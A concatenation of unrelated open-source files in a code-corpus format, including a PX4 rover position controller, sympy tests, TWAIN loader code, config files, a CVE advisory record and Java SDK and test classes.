if (!_control_mode.flag_control_manual_enabled && _control_mode.flag_control_position_enabled) {
if (control_position(current_position, ground_speed, _pos_sp_triplet)) {
//TODO: check if radius makes sense here
float turn_distance = _param_l1_distance.get(); //_gnd_control.switch_distance(100.0f);
// publish status
position_controller_status_s pos_ctrl_status{};
pos_ctrl_status.nav_roll = 0.0f;
pos_ctrl_status.nav_pitch = 0.0f;
pos_ctrl_status.nav_bearing = _gnd_control.nav_bearing();
pos_ctrl_status.target_bearing = _gnd_control.target_bearing();
pos_ctrl_status.xtrack_error = _gnd_control.crosstrack_error();
pos_ctrl_status.wp_dist = get_distance_to_next_waypoint(_global_pos.lat, _global_pos.lon,
_pos_sp_triplet.current.lat, _pos_sp_triplet.current.lon);
pos_ctrl_status.acceptance_radius = turn_distance;
pos_ctrl_status.yaw_acceptance = NAN;
pos_ctrl_status.timestamp = hrt_absolute_time();
_pos_ctrl_status_pub.publish(pos_ctrl_status);
}
} else if (!_control_mode.flag_control_manual_enabled && _control_mode.flag_control_velocity_enabled) {
_trajectory_setpoint_sub.update(&_trajectory_setpoint);
control_velocity(current_velocity);
}
}
// Respond to an attitude update and run the attitude controller if enabled
if (_control_mode.flag_control_attitude_enabled
&& !_control_mode.flag_control_position_enabled
&& !_control_mode.flag_control_velocity_enabled) {
control_attitude(_vehicle_att, _att_sp);
}
/* Only publish if any of the proper modes are enabled */
if (_control_mode.flag_control_velocity_enabled ||
_control_mode.flag_control_attitude_enabled ||
_control_mode.flag_control_position_enabled ||
_control_mode.flag_control_manual_enabled) {
// timestamp and publish controls
_act_controls.timestamp = hrt_absolute_time();
_actuator_controls_pub.publish(_act_controls);
vehicle_thrust_setpoint_s v_thrust_sp{};
v_thrust_sp.timestamp = hrt_absolute_time();
v_thrust_sp.xyz[0] = _act_controls.control[actuator_controls_s::INDEX_THROTTLE];
v_thrust_sp.xyz[1] = 0.0f;
v_thrust_sp.xyz[2] = 0.0f;
_vehicle_thrust_setpoint_pub.publish(v_thrust_sp);
vehicle_torque_setpoint_s v_torque_sp{};
v_torque_sp.timestamp = hrt_absolute_time();
v_torque_sp.xyz[0] = _act_controls.control[actuator_controls_s::INDEX_ROLL];
v_torque_sp.xyz[1] = _act_controls.control[actuator_controls_s::INDEX_PITCH];
v_torque_sp.xyz[2] = _act_controls.control[actuator_controls_s::INDEX_YAW];
_vehicle_torque_setpoint_pub.publish(v_torque_sp);
}
}
}
int RoverPositionControl::task_spawn(int argc, char *argv[])
{
RoverPositionControl *instance = new RoverPositionControl();
if (instance) {
_object.store(instance);
_task_id = task_id_is_work_queue;
if (instance->init()) {
return PX4_OK;
}
} else {
PX4_ERR("alloc failed");
}
delete instance;
_object.store(nullptr);
_task_id = -1;
return PX4_ERROR;
}
int RoverPositionControl::custom_command(int argc, char *argv[])
{
return print_usage("unknown command");
}
int RoverPositionControl::print_usage(const char *reason)
{
if (reason) {
PX4_WARN("%s\n", reason);
}
PRINT_MODULE_DESCRIPTION(
R"DESCR_STR(
### Description
Controls the position of a ground rover using an L1 controller.
Publishes `actuator_controls_0` messages at IMU_GYRO_RATEMAX.
### Implementation
Currently, this implementation supports only a few modes:
* Full manual: Throttle and yaw controls are passed directly through to the actuators
* Auto mission: The rover runs missions
* Loiter: The rover will navigate to within the loiter radius, then stop the motors
### Examples
CLI usage example:
$ rover_pos_control start
$ rover_pos_control status
$ rover_pos_control stop
)DESCR_STR");
PRINT_MODULE_USAGE_NAME("rover_pos_control", "controller");
PRINT_MODULE_USAGE_COMMAND("start")
PRINT_MODULE_USAGE_DEFAULT_COMMANDS();
return 0;
}
int rover_pos_control_main(int argc, char *argv[])
{
return RoverPositionControl::main(argc, argv);
}
| 7,544 |
8,323 | <filename>sympy/combinatorics/tests/test_util.py
from sympy.combinatorics.named_groups import SymmetricGroup, DihedralGroup,\
AlternatingGroup
from sympy.combinatorics.permutations import Permutation
from sympy.combinatorics.util import _check_cycles_alt_sym, _strip,\
_distribute_gens_by_base, _strong_gens_from_distr,\
_orbits_transversals_from_bsgs, _handle_precomputed_bsgs, _base_ordering,\
_remove_gens
from sympy.combinatorics.testutil import _verify_bsgs
def test_check_cycles_alt_sym():
perm1 = Permutation([[0, 1, 2, 3, 4, 5, 6], [7], [8], [9]])
perm2 = Permutation([[0, 1, 2, 3, 4, 5], [6, 7, 8, 9]])
perm3 = Permutation([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]])
assert _check_cycles_alt_sym(perm1) is True
assert _check_cycles_alt_sym(perm2) is False
assert _check_cycles_alt_sym(perm3) is False
def test_strip():
D = DihedralGroup(5)
D.schreier_sims()
member = Permutation([4, 0, 1, 2, 3])
not_member1 = Permutation([0, 1, 4, 3, 2])
not_member2 = Permutation([3, 1, 4, 2, 0])
identity = Permutation([0, 1, 2, 3, 4])
res1 = _strip(member, D.base, D.basic_orbits, D.basic_transversals)
res2 = _strip(not_member1, D.base, D.basic_orbits, D.basic_transversals)
res3 = _strip(not_member2, D.base, D.basic_orbits, D.basic_transversals)
assert res1[0] == identity
assert res1[1] == len(D.base) + 1
assert res2[0] == not_member1
assert res2[1] == len(D.base) + 1
assert res3[0] != identity
assert res3[1] == 2
def test_distribute_gens_by_base():
base = [0, 1, 2]
gens = [Permutation([0, 1, 2, 3]), Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1]), Permutation([3, 2, 1, 0])]
assert _distribute_gens_by_base(base, gens) == [gens,
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2]),
Permutation([0, 2, 3, 1])],
[Permutation([0, 1, 2, 3]),
Permutation([0, 1, 3, 2])]]
def test_strong_gens_from_distr():
strong_gens_distr = [[Permutation([0, 2, 1]), Permutation([1, 2, 0]),
Permutation([1, 0, 2])], [Permutation([0, 2, 1])]]
assert _strong_gens_from_distr(strong_gens_distr) == \
[Permutation([0, 2, 1]),
Permutation([1, 2, 0]),
Permutation([1, 0, 2])]
def test_orbits_transversals_from_bsgs():
S = SymmetricGroup(4)
S.schreier_sims()
base = S.base
strong_gens = S.strong_gens
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
result = _orbits_transversals_from_bsgs(base, strong_gens_distr)
orbits = result[0]
transversals = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert S.order() == order
def test_handle_precomputed_bsgs():
A = AlternatingGroup(5)
A.schreier_sims()
base = A.base
strong_gens = A.strong_gens
result = _handle_precomputed_bsgs(base, strong_gens)
strong_gens_distr = _distribute_gens_by_base(base, strong_gens)
assert strong_gens_distr == result[2]
transversals = result[0]
orbits = result[1]
base_len = len(base)
for i in range(base_len):
for el in orbits[i]:
assert transversals[i][el](base[i]) == el
for j in range(i):
assert transversals[i][el](base[j]) == base[j]
order = 1
for i in range(base_len):
order *= len(orbits[i])
assert A.order() == order
def test_base_ordering():
base = [2, 4, 5]
degree = 7
assert _base_ordering(base, degree) == [3, 4, 0, 5, 1, 2, 6]
def test_remove_gens():
S = SymmetricGroup(10)
base, strong_gens = S.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(S, base, new_gens) is True
A = AlternatingGroup(7)
base, strong_gens = A.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(A, base, new_gens) is True
D = DihedralGroup(2)
base, strong_gens = D.schreier_sims_incremental()
new_gens = _remove_gens(base, strong_gens)
assert _verify_bsgs(D, base, new_gens) is True
| 2,225 |
3,710 |
/*max@home*/
#include "twain.h"
#include "ttwain_state.h"
#include "ttwainP.h"
#include "ttwain_statePD.h"
#include "ttwain_util.h"
#ifdef __cplusplus
extern "C" {
#endif
extern void TTWAIN_SetState(TWAINSTATE status);
int TTWAIN_LoadSourceManagerPD(void) {
if (TTWAIN_GetState() >= TWAIN_SM_LOADED)
return TRUE; /* DSM already loaded */
TTwainData.DSM_Entry = DSM_Entry;
if (TTwainData.DSM_Entry != 0 /*kUnresolveCFragSymbolAddress*/) {
TTWAIN_SetAvailable(AVAIABLE_YES);
TTWAIN_SetState(TWAIN_SM_LOADED);
} else {
printf("DSM Entry NOT found !\n");
return FALSE;
}
return (TTWAIN_GetState() >= TWAIN_SM_LOADED);
}
int TTWAIN_UnloadSourceManagerPD(void) {
if (TTWAIN_GetState() == TWAIN_SM_LOADED) {
TTwainData.DSM_Entry = 0;
TTWAIN_SetState(TWAIN_PRESESSION);
}
return (TTWAIN_GetState() == TWAIN_PRESESSION);
}
/*-----------------------------------------------------------------------------*/
#ifdef __cplusplus
}
#endif
| 399 |
335 | {
"word": "Natter",
"definitions": [
"A casual and leisurely conversation."
],
"parts-of-speech": "Noun"
} | 59 |
304 | <reponame>ProfesseurGibaud/TestSite
from django.urls import path
# An alternative way is to use relative imports
from .views import hello
urlpatterns = [
path('', hello),
]
| 60 |
354 | {
"name": "speakeasy-nlp",
"description": "A simple natural language processor for node javascript.",
"homepage": "http://www.github.com/nhunzaker/speakeasy",
"keywords": [
"natural language"
],
"scripts": {
"format": "prettier --write lib/**/**/**.{js,md}",
"test": "vows"
},
"license": "MIT",
"author": "<NAME> <<EMAIL>>",
"repository": {
"type": "git",
"url": "git://github.com/nhunzaker/speakeasy.git"
},
"main": "index.js",
"version": "0.2.13",
"dependencies": {
"levenshtein": "*"
},
"devDependencies": {
"prettier": "^1.13.5",
"vows": "~0.8"
},
"prettier": {
"semi": false
}
}
| 293 |
892 | {
"schema_version": "1.2.0",
"id": "GHSA-mxp2-5233-73gr",
"modified": "2022-05-13T01:51:20Z",
"published": "2022-05-13T01:51:20Z",
"aliases": [
"CVE-2018-2566"
],
"details": "Vulnerability in the Integrated Lights Out Manager (ILOM) component of Oracle Sun Systems Products Suite (subcomponent: Remote Console Application). Supported versions that are affected are 3.x and 4.x. Difficult to exploit vulnerability allows low privileged attacker with network access via TLS to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized access to critical data or complete access to all Integrated Lights Out Manager (ILOM) accessible data. CVSS 3.0 Base Score 7.7 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N).",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N"
}
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-2566"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/102603"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1040205"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "HIGH",
"github_reviewed": false
}
} | 689 |
313 | <reponame>gridgentoo/titus-control-plane<gh_stars>100-1000
/*
* Copyright 2018 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.common.util.rx;
import java.util.List;
import java.util.concurrent.TimeUnit;
import java.util.function.Supplier;
import rx.Observable;
import rx.Producer;
import rx.Scheduler;
import rx.Subscriber;
import rx.Subscription;
import rx.subscriptions.Subscriptions;
/**
* See {@link ObservableExt#generatorFrom(Supplier)} (Observable, long, long, TimeUnit, Scheduler)}.
*/
class PeriodicGenerator<T> {
private final Observable<T> sourceObservable;
private final Scheduler scheduler;
private final long initialDelayMs;
private final long intervalMs;
PeriodicGenerator(Observable<T> sourceObservable,
long initialDelay,
long interval,
TimeUnit timeUnit,
Scheduler scheduler) {
this.sourceObservable = sourceObservable;
this.scheduler = scheduler;
this.initialDelayMs = timeUnit.toMillis(initialDelay);
this.intervalMs = timeUnit.toMillis(interval);
}
Observable<List<T>> doMany() {
return Observable.unsafeCreate(subscriber -> {
Subscription subscription = ObservableExt.generatorFrom(index -> doOne(index == 0), scheduler)
.flatMap(d -> d, 1)
.subscribe(new Subscriber<List<T>>() {
private Producer producer;
@Override
public void setProducer(Producer p) {
super.setProducer(p);
this.producer = p;
p.request(1);
}
@Override
public void onNext(List<T> item) {
subscriber.onNext(item);
producer.request(1);
}
@Override
public void onCompleted() {
subscriber.onCompleted();
}
@Override
public void onError(Throwable e) {
subscriber.onError(e);
}
}
);
subscriber.add(Subscriptions.create(subscription::unsubscribe));
});
}
private Observable<List<T>> doOne(boolean firstEmit) {
long delayMs = firstEmit ? initialDelayMs : intervalMs;
return Observable.timer(delayMs, TimeUnit.MILLISECONDS, scheduler).flatMap(tick -> sourceObservable).toList();
}
static <T> Observable<List<T>> from(Observable<T> sourceObservable,
long initialDelay,
long interval,
TimeUnit timeUnit,
Scheduler scheduler) {
return new PeriodicGenerator<>(sourceObservable, initialDelay, interval, timeUnit, scheduler).doMany();
}
}
| 2,005 |
1,350 | <reponame>Shashi-rk/azure-sdk-for-java<gh_stars>1000+
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.security.models;
import com.azure.core.annotation.Fluent;
import com.azure.core.util.logging.ClientLogger;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonProperty;
/** IoT Security solution analytics severity metrics. */
@Fluent
public final class IoTSeverityMetrics {
@JsonIgnore private final ClientLogger logger = new ClientLogger(IoTSeverityMetrics.class);
/*
* Count of high severity alerts/recommendations.
*/
@JsonProperty(value = "high")
private Long high;
/*
* Count of medium severity alerts/recommendations.
*/
@JsonProperty(value = "medium")
private Long medium;
/*
* Count of low severity alerts/recommendations.
*/
@JsonProperty(value = "low")
private Long low;
/**
* Get the high property: Count of high severity alerts/recommendations.
*
* @return the high value.
*/
public Long high() {
return this.high;
}
/**
* Set the high property: Count of high severity alerts/recommendations.
*
* @param high the high value to set.
* @return the IoTSeverityMetrics object itself.
*/
public IoTSeverityMetrics withHigh(Long high) {
this.high = high;
return this;
}
/**
* Get the medium property: Count of medium severity alerts/recommendations.
*
* @return the medium value.
*/
public Long medium() {
return this.medium;
}
/**
* Set the medium property: Count of medium severity alerts/recommendations.
*
* @param medium the medium value to set.
* @return the IoTSeverityMetrics object itself.
*/
public IoTSeverityMetrics withMedium(Long medium) {
this.medium = medium;
return this;
}
/**
* Get the low property: Count of low severity alerts/recommendations.
*
* @return the low value.
*/
public Long low() {
return this.low;
}
/**
* Set the low property: Count of low severity alerts/recommendations.
*
* @param low the low value to set.
* @return the IoTSeverityMetrics object itself.
*/
public IoTSeverityMetrics withLow(Long low) {
this.low = low;
return this;
}
/**
* Validates the instance.
*
* @throws IllegalArgumentException thrown if the instance is not valid.
*/
public void validate() {
}
}
| 1,006 |
4,036 |
def original(the_ast):
def walk(node, in_function, in_name_main):
def flags():
return in_function * 2 + in_name_main
if isinstance(node, ast.Module):
for import_node in walk(node.body, in_function, in_name_main):
yield import_node
elif isinstance(node, ast.ImportFrom):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield FromImport(node.level, node.module, aliases, flags())
elif isinstance(node, ast.Import):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield Import(aliases, flags())
elif isinstance(node, ast.FunctionDef):
for _, child in ast.iter_fields(node):
for import_node in walk(child, True, in_name_main):
yield import_node
elif isinstance(node, list):
for n in node:
for import_node in walk(n, in_function, in_name_main):
yield import_node
return list(walk(the_ast, False, False))
def similar_1(the_ast):
def walk(node, in_function, in_name_main):
def flags():
return in_function * 2 + in_name_main
if isinstance(node, ast.Module):
for import_node in walk(node.body, in_function, in_name_main):
yield import_node
elif isinstance(node, ast.ImportFrom):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield FromImport(node.level, node.module, aliases, flags())
elif isinstance(node, ast.Import):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield Import(aliases, flags())
elif isinstance(node, ast.FunctionDef):
for _, child in ast.iter_fields(node):
for import_node in walk(child, True, in_name_main):
yield import_node
return list(walk(the_ast, False, False))
def similar_2(the_ast):
def walk(node, in_function, in_name_main):
def flags():
return in_function * 2 + in_name_main
if isinstance(node, ast.Module):
for import_node in walk(node.body, in_function, in_name_main):
yield import_node
elif isinstance(node, ast.Import):
aliases = [ Alias(a.name, a.asname) for a in node.names]
yield Import(aliases, flags())
elif isinstance(node, ast.FunctionDef):
for _, child in ast.iter_fields(node):
for import_node in walk(child, True, in_name_main):
yield import_node
elif isinstance(node, list):
for n in node:
for import_node in walk(n, in_function, in_name_main):
yield import_node
return list(walk(the_ast, False, False))
| 1,333 |
2,830 | <reponame>nitikagarw/openwhisk<filename>ansible/files/auth_design_document_for_subjects_db_v2.0.0.json<gh_stars>1000+
{
"_id": "_design/subjects.v2.0.0",
"views": {
"identities": {
"map": "function (doc) {\n if (doc.namespaces && !doc.blocked) {\n doc.namespaces.forEach(function(namespace) {\n var v = {_id: namespace.name + '/limits', namespace: namespace.name, uuid: namespace.uuid, key: namespace.key};\n emit([namespace.name], v);\n emit([namespace.uuid, namespace.key], v);\n });\n }\n}"
}
},
"language": "javascript",
"indexes": {}
}
| 249 |
2,151 | /*
* Copyright (c) 2014 The Native Client Authors. All rights reserved.
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
#include <string.h>
#include "native_client/tests/pnacl_dynamic_loading/test_pso.h"
static int var = 2345;
/* Zero-initialized variables go in the BSS. Test a large BSS. */
static char bss_var[BSS_VAR_SIZE];
static int example_func(int *ptr) {
return *ptr + 1234;
}
static int *get_var(void) {
/* Test use of -fPIC by getting an address. */
return &var;
}
/*
* Test use of LLVM's memcpy intrinsic inside a PSO. (Clang will compile
* calls to memcpy() to uses of LLVM's memcpy intrinsic.)
*/
static void *memcpy_example(void *dest, const void *src, size_t size) {
return memcpy(dest, src, size);
}
/*
* Test use of 64-bit division. For a 32-bit architecture, this will call
* a function such as __divdi3, so this tests that such a function gets
* linked in if needed.
*/
static int64_t division_example(int64_t a, int64_t b) {
return a / b;
}
struct test_pso_root __pnacl_pso_root = {
example_func,
get_var,
bss_var,
memcpy_example,
division_example,
};
| 414 |
2,542 | <reponame>gridgentoo/ServiceFabricAzure
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#pragma once
namespace LBSimulator
{
class FM;
class DataGenerator
{
DENY_COPY(DataGenerator)
public:
static std::wstring GetMetricName(int metricIndex);
DataGenerator(FM & fm, int seed, Reliability::LoadBalancingComponent::PLBConfig & plbConfig);
void Parse(std::wstring const & fileName);
void Generate();
private:
static std::wstring const MetricCountStr;
static std::wstring const NodeCountStr;
static std::wstring const FaultDomainsStr;
static std::wstring const PartitionCountStr;
static std::wstring const ReplicaCountPerPartitionStr;
static std::wstring const NodeCapacityRatioRangeStr;
static std::wstring const NodeCapacityRangeStr;
static std::wstring const PrimaryLoadRangeStr;
static std::wstring const SecondaryLoadRangeStr;
static std::wstring const AffinitizedServicePairStr;
int MetricCount;
int NodeCount;
std::vector<Common::Uri> FaultDomains;
std::vector<int> PartitionCount;
std::vector<int> ReplicaCountPerPartition;
std::vector<LoadDistribution> NodeCapacityRange;
std::vector<LoadDistribution> PrimaryLoadRange;
std::vector<LoadDistribution> SecondaryLoadRange;
int AffinitizedServicePair;
int ReplicaCountPerAffinitizedService;
void ReadIntVec(std::wstring & line, std::vector<int> & vecInt);
void ReadLoadInputVec(std::wstring & line, std::vector<LoadDistribution> & vecLoad);
void GenerateNodes();
void GenerateServices();
void GenerateFailoverUnits();
void GeneratePlacements();
void GenerateService(int serviceIndex, int partitionCount, int replicaCount, wstring affinitizedService);
void GenerateFailoverUnit(int failoverUnitIndex, int serviceIndex, int replicaCount);
FM & fm_;
Common::Random random_;
Reliability::LoadBalancingComponent::PLBConfig & config_;
};
}
| 842 |
3,482 | #include <opencv2/core.hpp>
#include <opencv2/highgui.hpp>
#include <iostream>
#include <math.h>
// BGR -> HSV
cv::Mat BGR2HSV(cv::Mat img){
// get height and width
int width = img.cols;
int height = img.rows;
float r, g, b;
float h, s, v;
float _max, _min;
// prepare output
cv::Mat hsv = cv::Mat::zeros(height, width, CV_32FC3);
// each y, x
for (int y = 0; y < height; y++){
for (int x = 0; x < width; x++){
// BGR -> HSV
r = (float)img.at<cv::Vec3b>(y, x)[2] / 255;
g = (float)img.at<cv::Vec3b>(y, x)[1] / 255;
b = (float)img.at<cv::Vec3b>(y, x)[0] / 255;
_max = fmax(r, fmax(g, b));
_min = fmin(r, fmin(g, b));
// get Hue
if(_max == _min){
h = 0;
} else if (_min == b) {
h = 60 * (g - r) / (_max - _min) + 60;
} else if (_min == r) {
h = 60 * (b - g) / (_max - _min) + 180;
} else if (_min == g) {
h = 60 * (r - b) / (_max - _min) + 300;
}
// get Saturation
s = _max - _min;
// get Value
v = _max;
hsv.at<cv::Vec3f>(y, x)[0] = h;
hsv.at<cv::Vec3f>(y, x)[1] = s;
hsv.at<cv::Vec3f>(y, x)[2] = v;
}
}
return hsv;
}
// HSV -> BGR
cv::Mat HSV2BGR(cv::Mat hsv){
// get height and width
int width = hsv.cols;
int height = hsv.rows;
float h, s, v;
double c, _h, _x;
double r, g, b;
// prepare output
cv::Mat out = cv::Mat::zeros(height, width, CV_8UC3);
// each y, x
for (int y = 0; y < height; y++){
for (int x = 0; x < width; x++){
h = hsv.at<cv::Vec3f>(y, x)[0];
s = hsv.at<cv::Vec3f>(y, x)[1];
v = hsv.at<cv::Vec3f>(y, x)[2];
c = s;
_h = h / 60;
_x = c * (1 - abs(fmod(_h, 2) - 1));
r = g = b = v - c;
if (_h < 1) {
r += c;
g += _x;
} else if (_h < 2) {
r += _x;
g += c;
} else if (_h < 3) {
g += c;
b += _x;
} else if (_h < 4) {
g += _x;
b += c;
} else if (_h < 5) {
r += _x;
b += c;
} else if (_h < 6) {
r += c;
b += _x;
}
out.at<cv::Vec3b>(y, x)[0] = (uchar)(b * 255);
out.at<cv::Vec3b>(y, x)[1] = (uchar)(g * 255);
out.at<cv::Vec3b>(y, x)[2] = (uchar)(r * 255);
}
}
return out;
}
// inverse Hue
cv::Mat inverse_hue(cv::Mat hsv){
int height = hsv.rows;
int width = hsv.cols;
for(int y = 0; y < height; y++){
for(int x = 0; x < width; x++){
hsv.at<cv::Vec3f>(y, x)[0] = fmod(hsv.at<cv::Vec3f>(y, x)[0] + 180, 360);
}
}
return hsv;
}
int main(int argc, const char* argv[]){
// read image
cv::Mat img = cv::imread("imori.jpg", cv::IMREAD_COLOR);
// BGR -> HSV
cv::Mat hsv = BGR2HSV(img);
// Inverse Hue
hsv = inverse_hue(hsv);
// Gray -> Binary
cv::Mat out = HSV2BGR(hsv);
//cv::imwrite("out.jpg", out);
cv::imshow("sample", out);
cv::waitKey(0);
cv::destroyAllWindows();
return 0;
}
| 1,572 |
6,132 | <reponame>matthewpruett/angr<filename>angr/analyses/cfg/indirect_jump_resolvers/amd64_elf_got.py
import logging
from capstone.x86_const import X86_REG_RIP
from pyvex.stmt import IMark
from .resolver import IndirectJumpResolver
l = logging.getLogger(name=__name__)
class AMD64ElfGotResolver(IndirectJumpResolver):
def __init__(self, project):
super().__init__(project, timeless=True)
def filter(self, cfg, addr, func_addr, block, jumpkind):
if jumpkind != "Ijk_Call":
return False
return True
def resolve(self, cfg, addr, func_addr, block, jumpkind):
# Find the address and size of the last instruction
last_insn_addr = None
last_insn_size = None
for stmt in reversed(block.statements):
if isinstance(stmt, IMark):
last_insn_addr = stmt.addr
last_insn_size = stmt.len
break
if last_insn_addr is None:
# Cannot find the last instruction
return False, [ ]
# lift one instruction
insn = self.project.factory.block(last_insn_addr, size=last_insn_size).capstone.insns[-1]
opnd = insn.insn.operands[0]
# Must be of the form: call [rip + 0xABCD]
if not (opnd.mem and opnd.mem.disp and opnd.mem.base == X86_REG_RIP and not opnd.mem.index):
return False, [ ]
disp = insn.insn.disp
slot = disp + insn.address + insn.size
target = cfg._fast_memory_load_pointer(slot)
if target is None:
l.warning("Address %# is not mapped.", slot)
return False, [ ]
if not self.project.is_hooked(target):
return False, [ ]
dest = self.project.hooked_by(target)
l.debug("Resolved target to %s", dest.display_name)
return True, [target]
| 837 |
526 | /* SPDX-License-Identifier: Apache-2.0 */
/* Copyright Contributors to the ODPi Egeria project. */
package org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.typedefs;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.odpi.openmetadata.repositoryservices.connectors.stores.metadatacollectionstore.properties.instances.InstanceStatus;
import org.testng.annotations.Test;
import java.util.*;
import static org.testng.Assert.*;
/**
* TypeDefPatchTest provides test of TypeDefPatch
*/
public class TypeDefPatchTest
{
private String typeDefGUID = "TestTypeDefGUID";
private String typeDefName = "TestTypeDefName";
private long applyToVersion = 5L;
private long updateToVersion = 6L;
private String newVersionName = "TestNewVersionName";
private String description = "TestDescription";
private String descriptionGUID = "TestDescriptionGUID";
private List<TypeDefAttribute> typeDefAttributes = new ArrayList<>();
private Map<String, String> typeDefOptions = new HashMap<>();
private List<ExternalStandardMapping> externalStandardMappings = new ArrayList<>();
private List<InstanceStatus> validInstanceStatusList = new ArrayList<>();
private InstanceStatus initialStatus = InstanceStatus.APPROVED;
private List<TypeDefLink> validEntityDefs = new ArrayList<>(); // ClassificationDefs
private RelationshipEndDef endDef1 = new RelationshipEndDef(); // RelationshipDefs
private RelationshipEndDef endDef2 = new RelationshipEndDef(); // RelationshipDefs
public TypeDefPatchTest()
{
TypeDefAttribute attribute = new TypeDefAttribute();
attribute.setAttributeName("TestAttributeName");
attribute.setAttributeDescription("TestAttributeDescription");
typeDefAttributes.add(attribute);
typeDefOptions.put("TestOptionName", "TestOptionValue");
ExternalStandardMapping mapping = new ExternalStandardMapping();
mapping.setStandardName("TestStandardName");
mapping.setStandardOrganization("TestStandardOrg");
mapping.setStandardTypeName("TestStandardTypeName");
externalStandardMappings.add(mapping);
validInstanceStatusList.add(InstanceStatus.ACTIVE);
validInstanceStatusList.add(InstanceStatus.COMPLETE);
TypeDefLink validEntityDef = new TypeDefLink();
validEntityDef.setGUID("TestSuperGUID");
validEntityDef.setName("TestSuperName");
validEntityDef.setStatus(TypeDefStatus.ACTIVE_TYPEDEF);
validEntityDef.setReplacedByTypeGUID("TestNewSuperGUID");
validEntityDef.setReplacedByTypeName("TestNewSuperName");
validEntityDefs.add(validEntityDef);
endDef1.setAttributeName("TestEndDef1");
endDef2.setAttributeName("TestEndDef2");
}
/**
* Return a filled in test object
*
* @return test object
*/
private TypeDefPatch getTestObject()
{
TypeDefPatch testObject = new TypeDefPatch();
testObject.setTypeDefGUID(typeDefGUID);
testObject.setTypeDefName(typeDefName);
testObject.setApplyToVersion(applyToVersion);
testObject.setUpdateToVersion(updateToVersion);
testObject.setNewVersionName(newVersionName);
testObject.setDescription(description);
testObject.setDescriptionGUID(descriptionGUID);
testObject.setPropertyDefinitions(typeDefAttributes);
testObject.setTypeDefOptions(typeDefOptions);
testObject.setExternalStandardMappings(externalStandardMappings);
testObject.setInitialStatus(initialStatus);
testObject.setValidInstanceStatusList(validInstanceStatusList);
testObject.setInitialStatus(initialStatus);
testObject.setValidEntityDefs(validEntityDefs);
testObject.setEndDef1(endDef1);
testObject.setEndDef2(endDef2);
return testObject;
}
/**
* Validate supplied object.
*
* @param testObject object to test
*/
private void validateObject(TypeDefPatch testObject)
{
assertEquals(testObject.getTypeDefGUID(), typeDefGUID);
assertEquals(testObject.getTypeDefName(), typeDefName);
assertEquals(testObject.getApplyToVersion(), applyToVersion);
assertEquals(testObject.getUpdateToVersion(), updateToVersion);
assertEquals(testObject.getNewVersionName(), newVersionName);
assertEquals(testObject.getDescription(), description);
assertEquals(testObject.getDescriptionGUID(), descriptionGUID);
assertEquals(testObject.getPropertyDefinitions(), typeDefAttributes);
assertEquals(testObject.getTypeDefOptions(), typeDefOptions);
assertEquals(testObject.getExternalStandardMappings(), externalStandardMappings);
assertEquals(testObject.getValidInstanceStatusList(), validInstanceStatusList);
assertEquals(testObject.getInitialStatus(), initialStatus);
assertEquals(testObject.getValidEntityDefs(), validEntityDefs);
assertEquals(testObject.getEndDef1(), endDef1);
assertEquals(testObject.getEndDef2(), endDef2);
}
/**
* Validate that the constructors set up the correct properties
*/
@Test public void testConstructors()
{
TypeDefPatch testObject = new TypeDefPatch();
assertNull(testObject.getTypeDefGUID());
assertNull(testObject.getTypeDefName());
assertTrue(testObject.getApplyToVersion() == 0);
assertTrue(testObject.getUpdateToVersion() == 0);
assertNull(testObject.getNewVersionName());
assertNull(testObject.getDescription());
assertNull(testObject.getDescriptionGUID());
assertNull(testObject.getPropertyDefinitions());
assertNull(testObject.getTypeDefOptions());
assertNull(testObject.getExternalStandardMappings());
assertNull(testObject.getValidInstanceStatusList());
assertNull(testObject.getInitialStatus());
assertNull(testObject.getValidEntityDefs());
assertNull(testObject.getEndDef1());
assertNull(testObject.getEndDef2());
TypeDefPatch anotherTestObject = getTestObject();
validateObject(new TypeDefPatch(anotherTestObject));
anotherTestObject.setValidInstanceStatusList(new ArrayList<>());
